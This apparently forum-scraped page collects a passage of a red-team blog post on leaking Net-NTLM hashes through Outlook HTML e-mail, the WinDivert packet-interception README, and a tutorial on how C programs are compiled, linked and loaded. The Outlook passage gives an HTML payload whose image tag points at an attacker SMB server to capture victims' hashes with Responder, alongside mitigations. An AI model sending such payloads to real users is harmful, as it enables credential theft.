    Frequently Outlook is configured to render images automatically when the sender is trusted - common trust relationships are when the sender is internal to the organization. For instance, sending an HTML e-mail with an tag pointing to a rogue SMB server from malicious-adversary@blazeinfosec.com to victim@blazeinfosec.com, will make the Outlook client of victim@blazeinfosec.com render the e-mail automatically and leak NTLM hashes. This can be useful in a scenario where a penetration tester or red teamer has compromised a single e-mail account in the target organization and will use it to compromise other users individually or en masse by sending the bobby-trapped e-mail to a distribution list.

    Even though in some situations this technique is not as silent as the one described by Will Dormann, it has proved to be very effective in many of our engagements and should be in your attack toolbox.

    It is worth remembering Net-NTLM hashes cannot be used in Pass-the-Hash attacks, unlike pure NTLM hashes, they can be relayed (under some circumstances) [9] or cracked using off-the-shelf tools like hashcat.

    Exploitation steps

    Even though all it takes to exploit the issue is the ability to send an HTML e-mail, meaning it is possible to use any e-mail client or even a script to automate this attack, in this section we will describe how to achieve this using Microsoft Outlook itself.

    1) Create a HTML file with the following content:

    <html>  
    <img src="file:///10.30.1.23/test">Test NTLM leak via Outlook  
    </html>  
    

    The IP address above is for illustration only and was used in our labs. It can be any IP or hostname, including remote addresses.

    2) Create an e-mail message to the target. Add the HTML payload as an attachment but using the option "Insert as Text" so it will create the e-mail message as HTML.

    capture5-1.png

    3) The victim opens the e-mail without any further interaction:

    Capture3.PNG

    4) The target's Net-NTLM hashes were automatically captured by our Responder:

    Zrzut-ekranu-z-2018-06-28-16-42-32.png

    An important requirement for this exploit to work is obviously the ability of the target to connect to the attacker's SMB server on port 445. Some ISPs block this port by default, while many others do not. Interestingly enough, Microsoft maintains a small list [7] of ISPs that do not filter outbound access to port 445.

    Preventing the issue

    Once again, the problem described in this post is a design decision from Windows and for over 20 years it is known that it can be abused in a myriad of scenarios.

    There are a couple different ways to reduce the impact brought by this insecure behavior.

    Setting to 2 the value of the registry key RestrictSendingNTLMTraffic in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV10 will reduce the exposure of this risk, as Windows will no longer send the NTLMv1 or NTLMv2 hashes when challenged by a server, whether it is legitimate or rogue.

    However, it is likely to break functionality and single sign-on mechanisms, especially in corporate networks that heavily rely on NTLM authentication.

    Back in 2017 without much advertisement Microsoft also released a mitigation [4] for Windows 10 and Windows Server 2016 that prevents NTLM SSO authentication with resources that are not marked as internal by the Windows Firewall, denying NTLM SSO authentication for public resources, ultimately limiting the exposure of Net-NTLM hashes when challenged by external services like an attacker-operated SMB server. This feature is not activated by default and a user has to opt-in by explicitly applying changes to the registry.

    From a network security perspective, the adverse effect of this weakness can be mitigated by defining firewall rules that disallow SMB connections to reach non-whitelisted external servers, or even better blocking all external SMB connections altogether if this can be considered an option.

    Conclusion

    There are security risks related to NTLM authentication that are frequently overlooked, despite they have been known for over two decades now. Exploiting these issues are trivial and poses a serious risk to an organization, especially from an insider threat point of view or a compromised account scenario. Preventing this issue is not trivial but may be helped with some of the latest Microsoft patches and other carefully thought strategies to restrict NTLM traffic.

    Maybe one day Microsoft will release a patch or a service pack that will prevent Windows from leaking NTLM hashes all over the place.

    References

    [1] https://insights.sei.cmu.edu/cert/2018/04/automatically-stealing-password-hashes-with-microsoft-outlook-and-ole.html
    [2] https://blog.blazeinfosec.com/leveraging-web-application-vulnerabilities-to-steal-ntlm-hashes-2/
    [3] http://insecure.org/sploits/winnt.automatic.authentication.html
    [4] https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV170014
    [5] https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/smb-hash-hijacking-and-user-tracking-in-ms-outlook/
    [6] https://medium.com/@ValdikSS/deanonymizing-windows-users-and-capturing-microsoft-and-vpn-accounts-f7e53fe73834
    [7] http://witch.valdikss.org.ru/
    [8] https://social.technet.microsoft.com/wiki/contents/articles/32346.azure-summary-of-isps-that-allow-disallow-access-from-port-445.aspx
    [9] https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html

     

    Sursa: https://blog.blazeinfosec.com/love-letters-from-the-red-team-from-e-mail-to-ntlm-hashes-with-microsoft-outlook/

    • Thanks 1
  14. WinDivert 2.0: Windows Packet Divert
    ====================================
    
    1. Introduction
    ---------------
    
    Windows Packet Divert (WinDivert) is a user-mode packet interception library
    for Windows 7, Windows 8 and Windows 10.
    
    WinDivert enables user-mode capturing/modifying/dropping of network packets
    sent to/from the Windows network stack.  In summary, WinDivert can:
        - capture network packets
        - filter/drop network packets
        - sniff network packets
        - (re)inject network packets
        - modify network packets
    WinDivert can be used to implement user-mode packet filters, sniffers,
    firewalls, NATs, VPNs, IDSs, tunneling applications, etc..
    
    WinDivert supports the following features:
        - packet interception, sniffing, or dropping modes
        - support for loopback (localhost) traffic
        - full IPv6 support
        - network layer
        - simple yet powerful API
        - high-level filtering language
        - filter priorities
        - freely available under the terms of the GNU Lesser General Public
          License (LGPLv3)
    
    For more information see doc/windivert.html
    
    2. Architecture
    ---------------
    
    The basic architecture of WinDivert is as follows:
    
                                  +-----------------+
                                  |                 |
                         +------->|    PROGRAM      |--------+
                         |        | (WinDivert.dll) |        |
                         |        +-----------------+        |
                         |                                   | (3) re-injected
                         | (2a) matching packet              |     packet
                         |                                   |
                         |                                   |
     [user mode]         |                                   |
     ....................|...................................|...................
     [kernel mode]       |                                   |
                         |                                   |
                         |                                   |
                  +---------------+                          +----------------->
      (1) packet  |               | (2b) non-matching packet
     ------------>| WinDivert.sys |-------------------------------------------->
                  |               |
                  +---------------+
    
    The WinDivert.sys driver is installed below the Windows network stack.  The
    following actions occur:
    
    (1) A new packet enters the network stack and is intercepted by WinDivert.sys
    (2a) If the packet matches the PROGRAM-defined filter, it is diverted.  The
        PROGRAM can then read the packet using a call to WinDivertRecv().
    (2b) If the packet does not match the filter, the packet continues as normal.
    (3) PROGRAM either drops, modifies, or re-injects the packet.  PROGRAM can
        re-inject the (modified) using a call to WinDivertSend().
    
    3. License
    ----------
    
    WinDivert is dual-licensed under your choice of the GNU Lesser General Public
    License (LGPL) Version 3 or the GNU General Public License (GPL) Version 2.
    See the LICENSE file for more information.
    
    4. About
    --------
    
    WinDivert was written by basil.
    
    For further information, or bug reports, please contact:
    
        basil@reqrypt.org
    
    The homepage for WinDivert is:
    
        https://reqrypt.org/windivert.html
    
    The source code for WinDivert is hosted by GitHub at:
    
        https://github.com/basil00/Divert
    

     

    Sursa: https://github.com/basil00/Divert

  15. Life of a binary

    Written on April 15th, 2017 by Kishu Agarwal

    Almost every one of you must have written a program, compiled it and then ran it to see the fruits of your hard labour. It feels good to finally see your program working, isn’t it? But to make all of this work, we have someone else to thankful too. And that is your compiler (of course, assuming that you are working in a compiled language, not an interpreted one) which also does so much hard work behind the scenes.

    In this article, I will try to show you how the source code that you write is transformed into something that your machine is actually able to run. I am choosing Linux as my host machine and C as the programming language here, but the concepts here are general enough to apply to many compiled languages out there.

    Note: If you want to follow along in this article, then you will have to make sure that you have gcc, elfutils installed on your local machine.

    Let’s start with a simple C program and see how it get’s converted by the compiler.

    #include <stdio.h>
     
    // Main function
    int main(void) {
    int a = 1;
    int b = 2;
    int c = a + b;
    printf("%d\n", c);
    return 0;
    }
    view raw sample.c hosted with ❤ by GitHub

    This program creates two variables, adds them up and print the result on the screen. Pretty simple, huh?

    But let’s see what this seemingly simple program has to go through to finally get executed on your system.

    Compiler has usually the following five steps (with the last step being part of the OS)-

     

    Preprocessing

    <font style="font-size: 14px">Preprocessing</font>

    Compilation

    <font style="font-size: 14px">Compilation</font>

    Assembly

    <font style="font-size: 14px">Assembly</font>

    Linking

    [Not supported by viewer]

    Loading

    [Not supported by viewer]

    Let’s go through each of the step in sufficient detail.

     

    Preprocessing

    <font style="font-size: 14px" color="#ffffff">Preprocessing</font>

    Compilation

    <font style="font-size: 14px">Compilation</font>

    Assembly

    <font style="font-size: 14px">Assembly</font>

    Linking

    [Not supported by viewer]

    Loading

    [Not supported by viewer]

    First step is the Preprocessing step which is done by the Preprocessor. Job of the Preprocessor is to handle all the preprocessor directives present in your code. These directives start with #. But before it processes them, it first removes all the comments from the code as comments are there only for the human readability. Then it finds all the # commands, and does what the commands says.

    In the code above, we have just used #include directive, which simply says to the Preprocesssor to copy the stdio.h file and paste it into this file at the current location.

    You can see the output of the Preprocessor by passing -E flag to the gcc compiler.

    gcc -E sample.c

    You would get something like the following-

    # 1 "sample.c"
    # 1 "<built-in>"
    # 1 "<command-line>"
    # 1 "/usr/include/stdc-predef.h" 1 3 4
    # 1 "<command-line>" 2
    # 1 "sample.c"
     
    # 1 "/usr/include/stdio.h" 1 3 4
     
    -----omitted-----
     
     
    # 5 "sample.c"
    int main(void) {
    int a = 1;
    int b = 2;
    int c = a + b;
    printf("%d\n", c);
    return 0;
    }

     

    Preprocessing

    <font style="font-size: 14px" color="#ffffff">Preprocessing</font>

    Compilation

    [Not supported by viewer]

    Assembly

    <font style="font-size: 14px">Assembly</font>

    Linking

    [Not supported by viewer]

    Loading

    [Not supported by viewer]

    Confusingly, the second step is also called compilation. The compiler takes the output from the Preprocessor and is responsbile to do the following important tasks.

    • Pass the output through a lexical analyser to identify various tokens present in the file. Tokens are just literals present in your program like ‘int’, ‘return’, ‘void’, ‘0’ and so on. Lexical Analyser also associates with each token the type of the token, whether the token is a string literal, integer, float, if token, and so on.

    • Pass the output of the lexical analyser to the syntax analyser to check whether the program is written in a way that satisfy the grammar rules of the language the program is written in. For example, it will raise syntax error when parsing this line of code,

        b = a + ;

    since + is a missing one operand.

    • Pass the output of the syntax analyser to the semantic analyser, which checks whether the program satisfies semantics of the language like type checking and variables are declared before their first usage, etc.

    • If the program is syntactically correct, then the source code is converted into the assembly intructions for the specified target architecture. By default, it generates assembly for the machine it is running on. But suppose, you are building programs for embedded systems, then you can pass the architecture of the target machine and gcc will generate assembly for that machine.

    To see the output from this stage, pass the -S flag to the gcc compiler.

    gcc -S sample.c

    You would get something like the following depending upon on your environment.

    .file "sample.c" // name of the source file
    .section .rodata // Read only data
    .LC0: // Local constant
    .string "%d\n" // string constant we used
    .text // beginning of the code segment
    .globl main // declare main symbol to be global
    .type main, @function // main is a function
    main: // beginning of main function
    .LFB0: // Local function beginning
    .cfi_startproc // ignore them
    pushq %rbp // save the caller's frame pointer
    .cfi_def_cfa_offset 16
    .cfi_offset 6, -16
    movq %rsp, %rbp // set the current stack pointer as the frame base pointer
    .cfi_def_cfa_register 6
    subq $16, %rsp // set up the space
    movl $1, -12(%rbp)
    movl $2, -8(%rbp)
    movl -12(%rbp), %edx
    movl -8(%rbp), %eax
    addl %edx, %eax
    movl %eax, -4(%rbp)
    movl -4(%rbp), %eax
    movl %eax, %esi
    movl $.LC0, %edi
    movl $0, %eax
    call printf
    movl $0, %eax
    leave
    .cfi_def_cfa 7, 8
    ret // return from the function
    .cfi_endproc
    .LFE0:
    .size main, .-main // size of the main function
    .ident "GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.4) 5.4.0 20160609"
    .section .note.GNU-stack,"",@progbits // make stack non-executable
    view raw sample.s hosted with ❤ by GitHub

    If you don’t know assembly language, it all looks pretty scary at first, but it is not that bad. It takes more time to understand the assembly code than your normal high level language code, but given enough time, you can surely read it.

    Let’s see what this file contains.

    All the lines beginning with ‘.’ are the assembler directives. .file denotes the name of the source file, which can be used for debugging purposes. The string literal in our source code %d\n now resides in the .rodata section (ro means read-only), since it is a read only string. The compiler named this string as LC0, to later refer to it in the code. Whenever you see a label starting with .L, it means that those labels are local to the current file and will not visible to the other files.

    .globl tells that main is a global symbol, which means that the main can be called from other files. .type tells that main is a function. Then follows the assembly for the main function. You can ignore the directives starting with cfi. They are used for call stack unwinding in case of exceptions. We will ignore them in this article, but you can know more about them here.

    Let’s try to understand now the disassembly of the main function.

     

    rbp

    [Not supported by viewer]

    rsp

    [Not supported by viewer]

    Before main function call
    Fig. 1

    [Not supported by viewer]

    rsp,rbp

    <font style="font-size: 20px">rsp,rbp</font>

    Let's call it X

    [Not supported by viewer]

    X

    [Not supported by viewer]

    X

    [Not supported by viewer]

    rbp

    [Not supported by viewer]

    Value of c

    [Not supported by viewer]

    Value of b

    [Not supported by viewer]

    Value of a

    [Not supported by viewer]

    rsp

    [Not supported by viewer]

    rbp-12

    [Not supported by viewer]

    rbp-8

    [Not supported by viewer]

    rbp-4

    [Not supported by viewer]

    rbp-4

    [Not supported by viewer]

    Setting Local variables
    Fig. 3

    [Not supported by viewer]

    Saving Caller's function frame pointer
    Fig. 2

    [Not supported by viewer]

    11. You must be knowing that when you call a function, a new stack frame is created for that function. To make that possible, we need some way of knowing the start of the caller’s function frame pointer when the new function returns. That’s why we push the current frame pointer which is stored in the rbp register onto the stack.

    14 Move the current stack pointer into the base pointer. This becomes our current function frame pointer. Fig. 1 depicts the state before pushing the rbp register and Fig. 2 shows after the previous frame pointer is pushed and the stack pointer is moved to the current frame pointer.

    16 We have 3 local variables in our program, all of types int. On my machine, each int occupies 4 bytes, so we need 12 bytes of space on the stack to hold our local variables. The way we create space for our local variables on the stack, is decrement our stack pointer by the number of bytes we need for our local variables. Decrement, because stack grows from higher addresses to lower addresses. But here you see we are decrementing by 16 instead of 12. The reason is, space is allocated in the chunks of 16 bytes. So, even if you have 1 local variable, space of 16 bytes would be allocated on the stack. This is done for performance reasons on some architecures. See Fig. 3 to see how the stack is laid out right now.

    17-22 This code is pretty straight forward. The compiler has used the slot rbp-12 as the storage for variable a, rbp-8 for b and rbp-4 for c. It moves the the values 1 and 2 to address of variable a and b respectively. To prepare for the addition, it moves the b value to edx register and the value of the a register to the eax register. The result of the addition is stored in the eax register which is later transferred to the address of the c variable.

    23-27 Then we prepare for our printf call. Firstly, the value of the c variable is moved to the esi register. And then address of our string constant %d\n is moved to the edi register. esi and edi registers now hold the argument of our printf call. edi holds the first argument and esi holds the second argument. Then we call the printf function to print the value of the variable c formatted as the integer value. Point to note here is that printf symbol is undefined at this point. We would see how this printf symbol gets resolved later on in this article.

    .size tells the size of the main function in bytes. “.-main” is an expression where the . symbol means the address of the current line. So this expression evaluates to current_address_of the line - address of the main function which gives us the size of the main function in bytes.

    .ident just tell the assembler to add the following line in the .comment section. .note.GNU-stack is used for telling whether the stack for this program is executable or not. Mostly the value for this directive is null string, which tells the stack is not executable.

     

    Preprocessing

    <font style="font-size: 14px" color="#ffffff">Preprocessing</font>

    Compilation

    [Not supported by viewer]

    Assembly

    [Not supported by viewer]

    Linking

    [Not supported by viewer]

    Loading

    [Not supported by viewer]

    What we have right now is our program in the assembly language, but it is still in the language which is not understood by the processors. We have to convert the assembly language to the machine language, and that work is done by the Assembler. Assembler takes your assembly file and produces an object file which is a binary file containing the machine instructions for your program.

    Let’s convert our assembly file to the object file to see the process in action. To get the object file for your program, pass the c flag to the gcc compiler.

    gcc -c sample.c

    You would get a object file with an extension of .o. Since, this is a binary file, you won’t be able to open it in a normal text editor to view it’s contents. But we have tools at our disposal, to find out what is lying inside in those object files.

    Object files could have many different file formats. We will be focussing on one in particular which is used on the Linux and that is the ELF file format.

    ELF files contains following information-

    • ELF Header
    • Program header table
    • Section header table
    • Some other data referred to by the previous tables

    ELF Header contains some meta information about the object file such as type of the file, machine against which binary is made, version, size of the header, etc. To view header, just pass -h flag to eu-readelf utility.

    $ eu-readelf -h sample.o
    ELF Header:
    Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
    Class: ELF64
    Data: 2's complement, little endian
    Ident Version: 1 (current)
    OS/ABI: UNIX - System V
    ABI Version: 0
    Type: REL (Relocatable file)
    Machine: AMD x86-64
    Version: 1 (current)
    Entry point address: 0
    Start of program headers: 0 (bytes into file)
    Start of section headers: 704 (bytes into file)
    Flags:
    Size of this header: 64 (bytes)
    Size of program header entries: 0 (bytes)
    Number of program headers entries: 0
    Size of section header entries: 64 (bytes)
    Number of section headers entries: 13
    Section header string table index: 10
    view raw elf_header.sh hosted with ❤ by GitHub

    From the above listing, we see that this file doesn’t have any Program Headers and that is fine. Program Headers are only present in the executable files and shared libraries. We will see Program Headers when we link the file in the next step.

    But we do have 13 sections. Let’s see what are these sections. Use the -S flag.

    $ eu-readelf -S sample.o
    There are 13 section headers, starting at offset 0x2c0:
     
    Section Headers:
    [Nr] Name Type Addr Off Size ES Flags Lk Inf Al
    [ 0] NULL 0000000000000000 00000000 00000000 0 0 0 0
    [ 1] .text PROGBITS 0000000000000000 00000040 0000003c 0 AX 0 0 1
    [ 2] .rela.text RELA 0000000000000000 00000210 00000030 24 I 11 1 8
    [ 3] .data PROGBITS 0000000000000000 0000007c 00000000 0 WA 0 0 1
    [ 4] .bss NOBITS 0000000000000000 0000007c 00000000 0 WA 0 0 1
    [ 5] .rodata PROGBITS 0000000000000000 0000007c 00000004 0 A 0 0 1
    [ 6] .comment PROGBITS 0000000000000000 00000080 00000035 1 MS 0 0 1
    [ 7] .note.GNU-stack PROGBITS 0000000000000000 000000b5 00000000 0 0 0 1
    [ 8] .eh_frame PROGBITS 0000000000000000 000000b8 00000038 0 A 0 0 8
    [ 9] .rela.eh_frame RELA 0000000000000000 00000240 00000018 24 I 11 8 8
    [10] .shstrtab STRTAB 0000000000000000 00000258 00000061 0 0 0 1
    [11] .symtab SYMTAB 0000000000000000 000000f0 00000108 24 12 9 8
    [12] .strtab STRTAB 0000000000000000 000001f8 00000016 0 0 0 1
    view raw elf_section.sh hosted with ❤ by GitHub

    You don’t need to understand whole of the above listing. But essentially, for each section, it lists various information, like the name of the section, size of the section and the offset of the section from the start of the file. Important sections for our use are the following-

    • text section contains our machine code
    • rodata section contains the read only data in our program. It may be constants or string literals that you may have used in your program. Here it just contains %d\n
    • data sections contains the initialized data of our program. Here it is empty, since we don’t have any initialized data
    • bss section is like the data section but contains the uninitialized data of our program. Uninitalized data could be a array declared like int arr[100], which becomes part of this section. One point to note about the bss section is that, unlike the other sections which occupy space depending upon their content, bss section just contain the size of the section and nothing else. The reason being at the time of loading, all that is needed is the count of bytes that we need to allocate in this section. In this way we reduce the size of the final executable
    • strtab section list all the strings contained in our program
    • symtab section is the symbol table. It contains all the symbols(variable and function names) of our program.
    • rela.text section is the relocation section. More about this later.

    You can also view the contents of these sections, just pass the corresponding section number to the eu-readelf program. You can also use the objdump tool. It can also provide you with the dissembly for some of the sections.

    Let’s talk in little more detail about the rela.text section. Remember the printf function that we used in our program. Now, printf is something that we haven’t defined by ourself, it is part of the C library. Normally when you compile your C programs, the compiler will compile them in a way so that C functions that you call are not bundled in with your executable, which thus reduces the size of the final executable. Instead a table is made of all those symbols, called a, relocation table, which is later filled by something in called the loader. We will discuss more about the loader part later on, but for now, the important thing is that the if you look at the rela.text section, you would find the printf symbol listed down there. Let’s confirm that once here.

    $ eu-readelf -r sample.o
     
    Relocation section [ 2] '.rela.text' for section [ 1] '.text' at offset 0x210 contains 2 entries:
    Offset Type Value Addend Name
    0x0000000000000027 X86_64_32 000000000000000000 +0 .rodata
    0x0000000000000031 X86_64_PC32 000000000000000000 -4 printf
     
    Relocation section [ 9] '.rela.eh_frame' for section [ 8] '.eh_frame' at offset 0x240 contains 1 entry:
    Offset Type Value Addend Name
    0x0000000000000020 X86_64_PC32 000000000000000000 +0 .text
    view raw elf_relocation.sh hosted with ❤ by GitHub

    You can ignore the second relocation section .rela.eh_frame. It has to do with exception handling, which is not of much interest to us here. Let’s see the first section there. There we can see two entries, one of which is our printf symbol. What does this entry mean is that, there is a symbol used in this file with a name of printf but has not been defined, and that symbol is located in this file at the offset 0x31 from the start of the .text section. Let’s check what is at the offset 0x31 right now in the .text section.

    $ eu-objdump -d -j .text sample.o
    sample.o: elf64-elf_x86_64
     
    Disassembly of section .text:
     
    0: 55 push %rbp
    1: 48 89 e5 mov %rsp,%rbp
    4: 48 83 ec 10 sub $0x10,%rsp
    8: c7 45 f4 01 00 00 00 movl $0x1,-0xc(%rbp)
    f: c7 45 f8 02 00 00 00 movl $0x2,-0x8(%rbp)
    16: 8b 55 f4 mov -0xc(%rbp),%edx
    19: 8b 45 f8 mov -0x8(%rbp),%eax
    1c: 01 d0 add %edx,%eax
    1e: 89 45 fc mov %eax,-0x4(%rbp)
    21: 8b 45 fc mov -0x4(%rbp),%eax
    24: 89 c6 mov %eax,%esi
    26: bf 00 00 00 00 mov $0x0,%edi
    2b: b8 00 00 00 00 mov $0x0,%eax
    30: e8 00 00 00 00 callq 0x35 <<<<<< offset 0x31
    35: b8 00 00 00 00 mov $0x0,%eax
    3a: c9 leaveq
    3b: c3 retq
    view raw main_objdump.o hosted with ❤ by GitHub

    Here you can see the call instruction at offset 0x30. e8 stands for the opcode of the call instruction followed by the 4 bytes from offset 0x31 to 0x34, which should correspond to our printf function actual address which we don’t have right now, so they are just 00’s. (Later on, we will see that is location doesn’t actually hold the printf address, but indirectly calls it using something called plt table. We will cover this part later)

     

    Preprocessing

    <font style="font-size: 14px" color="#ffffff">Preprocessing</font>

    Compilation

    [Not supported by viewer]

    Assembly

    [Not supported by viewer]

    Linking

    [Not supported by viewer]

    Loading

    [Not supported by viewer]

    All the things that we have done till now have worked on a single source file. But in reality, that is the rarely the case. In real production code, you have hundred’s of thousand’s of source code files which you would need to compile and create a executable. Now how the steps that we followed till now would compare in that case?

    Well, the steps would all remain the same. All the source code files would individually get preprocessed, compiled, assembed and we would get separate object code files at the end.

    Now each source code file wouldn’t have been written in isolation. They must have some functions, global variables which must be defined in some file and used at different locations in other files.

    It is the job of the linker to gather all the object files, go through each of them and track which symbol does each file defines and which symbols does it uses. It could find all these information in the symbol table in each of the object files. After gathering all these information, the linker creates a single object file combining all the sections from each of the individual object files into their corresponding sections and relocating all the symbols that can be resolved.

    In our case, we don’t have collection of source files, we have just one file, but since we use printf function from the C library, our source file will by dynamically linked with the C library. Let’s now link our program and further investigate the output.

    gcc sample.c

    I won’t go into much detail here, since it is also a ELF file that we saw above, with just some new sections. One thing to note here is, when we saw the object file that we got from the assembler, the addresses that we saw were relative. But after having linked all the files, we have pretty much idea, where all the pieces go and thus, if you examine the output of these stage, it contains absolute addresses also.

    At this stage, linker has identified all the symbols that are being used in our program, who uses those symbols, and who has defined those symbols. Linker just maps the address of the definition of the symbol to the usage of the symbol. But after doing all this, there still exists some symbols that are not yet resolved at this point, one of the being our printf symbol. In general, these are such symbols which are either externally defined variables or externally defined functions. Linker also creates a relocation table, the same as that was created by the Assembler, with those entries which are still unresolved.

    At this point, there is one thing you should know. The functions and data you use from other libraries, can be statically linked or dynamically linked. Static linking means that the functions and data from those libraries would be copied and pasted into your executable. Whereas, if you do dynamic linking, then those functions and data are not copied into your executable, thus reducing your final executable size.

    For a libray to have facility of dyamic linking against it, the library must be a shared library (so file). Normally, the common libraries used by many programs comes as shared libraries and one of them is our libc library. libc is used by so many programs that if every program started to statically link against it, then at any point, there would be so many copies of the same code occupying space in your memory. Having dynamic linking saves this problem, and at any moment only one copy of the libc would be occupying space in the memory and all the programs would be referencing from that shared library.

    To make the dynamic linking possible, the linker creates two more sections that weren’t there in the object code generated by the assembler. These are the .plt (Procedure Linkage table) and the .got (Global Offset Table) sections. We will cover about these sections when we come to loading our executable, as these sections come useful when we actually load the executable.

     

    Preprocessing

    <font style="font-size: 14px" color="#ffffff">Preprocessing</font>

    Compilation

    [Not supported by viewer]

    Assembly

    [Not supported by viewer]

    Linking

    [Not supported by viewer]

    Loading

    [Not supported by viewer]

    Now it is time to actually run our executable file.

    When you click on the file in your GUI, or run it from the command line, indirectly execev system call is invoken. It is this system call, where the kernel starts the work of loading your executable in the memory.

    Remember the Program Header Table from above. This is where it is very useful.

    $ eu-readelf -l a.out
    Program Headers:
    Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
    PHDR 0x000040 0x0000000000400040 0x0000000000400040 0x0001f8 0x0001f8 R E 0x8
    INTERP 0x000238 0x0000000000400238 0x0000000000400238 0x00001c 0x00001c R 0x1
    [Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]
    LOAD 0x000000 0x0000000000400000 0x0000000000400000 0x000724 0x000724 R E 0x200000
    LOAD 0x000e10 0x0000000000600e10 0x0000000000600e10 0x000228 0x000230 RW 0x200000
    DYNAMIC 0x000e28 0x0000000000600e28 0x0000000000600e28 0x0001d0 0x0001d0 RW 0x8
    NOTE 0x000254 0x0000000000400254 0x0000000000400254 0x000044 0x000044 R 0x4
    GNU_EH_FRAME 0x0005f8 0x00000000004005f8 0x00000000004005f8 0x000034 0x000034 R 0x4
    GNU_STACK 0x000000 0x0000000000000000 0x0000000000000000 0x000000 0x000000 RW 0x10
    GNU_RELRO 0x000e10 0x0000000000600e10 0x0000000000600e10 0x0001f0 0x0001f0 R 0x1
     
    Section to Segment mapping:
    Segment Sections...
    00
    01 [RO: .interp]
    02 [RO: .interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt .plt.got .text .fini .rodata .eh_frame_hdr .eh_frame]
    03 [RELRO: .init_array .fini_array .jcr .dynamic .got] .got.plt .data .bss
    04 [RELRO: .dynamic]
    05 [RO: .note.ABI-tag .note.gnu.build-id]
    06 [RO: .eh_frame_hdr]
    07
    08 [RELRO: .init_array .fini_array .jcr .dynamic .got]
    view raw elf_pht.sh hosted with ❤ by GitHub

     

    How would the kernel know where to find this table in the file? Well, that information could be found in the ELF Header which always starts at offset 0 in the file. Having done that, kernel looks up all the entries which are of type LOAD and loads them into the memory space of the process.

    As you can see from the above listing, there are two entries of type LOAD. You can also see which sections are contained in each segment.

    Modern operating systems and processors manage memory in terms of pages. Your computer memory is divided into fixed size chunks and when any process asks for some memory, the operating system allots some number of pages to that process. Apart from the benefit of managing memory efficiently, this also has the benefit of providing security. Operating systems and kernel can set protection bits for each page. Protection bits specifies whether the particular page is Read only, could be written or can be executed. A page whose protection bit is set as Read only, can’t be modified and thus prevents from intentional or unintentional modification of data.

    Read only pages have also one benefit that multiple running processes for the same program can share the same pages. Since the pages are read only, no running process can modify those pages and thus, every process would work just fine.

    To set up these protection bits we somehow would have to tell the kernel, which pages have to be marked Read only and which could be Written and Executed. These information is stored in the Flags in each of the entries above.

    Notice the first LOAD entry. It is marked as R and E, which means that these segment could be read and executed but can’t be modified and if you look down and see which sections come in these segment, you can see two familiar sections there, .text and .rodata. Thus our code and read-only data can only be read and executed but can’t be modified which is what should happen.

    Similary, second LOAD entry contains the initialized and non initialized data, GOT table (more on this later) which are marked as RW and thus can be read and written but can’t be executed.

    After loading these segments and setting up their permissions, the kernel checks if there is .interp segment or not. In the statically linked executable, there is no need for this segment, since the executable contains all the code that it needs, but for the dynamically linked executable, this segment is important. This segment contains the .interp section which contains the path to the dynamic linker. (You can check that there is no .interp segment in the statically linked executable by passing -static flag to the gcc compiler and checking the header table in the resulting executable)

    In our case, it would find one and it points to the dynamic linker at this path /lib64/ld-linux-x86-64.so.2. Similarly to our executable, the kernel would start loading these shared object by reading the header, finding its segments and loading them in the memory space of the our current program. In statically linked executable where all this is not needed, the kernel would have given control to our program, here the kernel gives control to the dynamic linker and pushes the address of our main function to be called on the stack, so that after dynamic linker finishes it’s job, it knows where to hand over the control to.

    We should now understand the two tables we have been skipping over for too long now, Procedure Linkage Table and Global Offset Table as these are closely related to the function of dynamic linker.

    There might be two types of relocations needed in your program. Variables relocations and function relocations. For a variable which is externally defined, we include that entry in the GOT table and the functions which are externally defined we include those entries in both the tables. So, essentially, GOT table has entries for all the externally defined variables as well as functions, and PLT table has entries for only the functions. The reason why we have two entries for functions will be clear by the following example.

    Let us take an example of printf function to see how these tables works. In our main function, let’s see the call instruction to printf function.

    400556:    e8 a5 fe ff ff           callq   0x400400

    This call instruction is calling an address which is part of the .plt section. Let’s see what is there.

    $ objdump -d -j .plt a.out
    a.out: file format elf64-x86-64
     
    Disassembly of section .plt:
     
    00000000004003f0 <printf@plt-0x10>:
    4003f0: ff 35 12 0c 20 00 pushq 0x200c12(%rip) # 601008 <_GLOBAL_OFFSET_TABLE_+0x8>
    4003f6: ff 25 14 0c 20 00 jmpq *0x200c14(%rip) # 601010 <_GLOBAL_OFFSET_TABLE_+0x10>
    4003fc: 0f 1f 40 00 nopl 0x0(%rax)
     
    0000000000400400 <printf@plt>:
    400400: ff 25 12 0c 20 00 jmpq *0x200c12(%rip) # 601018 <_GLOBAL_OFFSET_TABLE_+0x18>
    400406: 68 00 00 00 00 pushq $0x0
    40040b: e9 e0 ff ff ff jmpq 4003f0 <_init+0x28>
     
    0000000000400410 <__libc_start_main@plt>:
    400410: ff 25 0a 0c 20 00 jmpq *0x200c0a(%rip) # 601020 <_GLOBAL_OFFSET_TABLE_+0x20>
    400416: 68 01 00 00 00 pushq $0x1
    40041b: e9 d0 ff ff ff jmpq 4003f0 <_init+0x28>
    view raw elf_plt_printf.sh hosted with ❤ by GitHub

    For each externally defined function, we have an entry in the plt section and all look the same and have three instructions, except the first entry. This is a special entry which we will see the use of later.

    There we find a jump to the value contained at the address 0x601018. These address is an entry in the GOT table. Let’s see the content of these address.

    $ objdump -s a.out | grep -A 3 '.got.plt'
    Contents of section .got.plt:
    601000 280e6000 00000000 00000000 00000000 (.`.............
    601010 00000000 00000000 06044000 00000000 ..........@.....
    601020 16044000 00000000 ..@.....
    view raw elf_got_printf.sh hosted with ❤ by GitHub

    This is where the magic happens. Except the first time when the printf function is called, the value at this address would be the actual address of the printf function from the C library and we would simply jump to that location. But for the first time, something else happens.

    When printf function is called for the first time, value at this location is the address of the next instruction in the plt entry of the printf function. As you can see from the above listing, it is 400406 which is stored in little endian format. At this location in the plt entry, we have a push instruction which pushes 0 onto the stack. Each plt entry have same push instruction but they push different numbers. 0 here denotes the offset of the printf symbol in the relocation table. The push instruction is then followed by the jump instruction which jumps to the first instruction in the first plt entry.

